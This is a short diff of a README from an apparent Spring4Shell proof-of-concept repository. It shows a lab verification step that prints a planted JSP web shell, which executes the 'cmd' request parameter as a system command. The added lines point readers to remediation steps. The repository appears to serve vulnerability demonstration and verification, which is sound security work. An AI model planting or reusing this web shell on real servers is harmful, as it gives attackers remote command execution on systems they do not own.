anair-it/springshell-vuln-POC/springshell-boot-zeroday/README.md

 3. Review jsp content:
    `docker exec -it springshell bash -c "cd webapps/ROOT;cat springshell.jsp"` will display `<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } %>//`
-   _This means the application is compromised_
+   _This means the application is compromised_.
+Refer remediation steps in the references below

 ### spring-boot jar
 1. Run command to: